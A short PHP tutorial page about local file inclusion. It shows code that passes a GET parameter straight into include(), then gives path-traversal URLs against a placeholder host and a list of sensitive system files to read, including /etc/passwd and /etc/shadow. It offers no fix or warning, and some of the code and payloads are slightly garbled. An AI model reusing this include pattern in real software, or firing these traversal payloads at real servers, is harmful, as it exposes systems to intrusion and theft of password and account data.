Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home > Backend Development > PHP Tutorial > PHP forges local files containing vulnerable code

PHP forges local files containing vulnerable code

高洛峰
Release: 2023-03-01 12:56:02
Original
1300 people have browsed it

The code is as follows:
$page=$_GET['page'];
include($page.'php');
?>

You can use it like this
http://www.xxx .com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www .xxx.com/index.php?page=..../../etc/passwd

Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc /group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Related labels:
php
Previous article:How to use explode in php to find whether a certain character exists Next article:Complete knowledge about php operators
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Hello! Is "PHP Toolbox" developed using PHP? (Prepare to learn PHP)
From 1970-01-01 08:00:00
0
0
0
php data acquisition?
From 1970-01-01 08:00:00
0
0
0
PHP extension intl
From 1970-01-01 08:00:00
0
0
0
How to learn php well
From 1970-01-01 08:00:00
0
0
0
When adding sublime3 to compile system php, use the PHP toolbox, cmd php -v is useless
From 1970-01-01 08:00:00
0
0
0
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template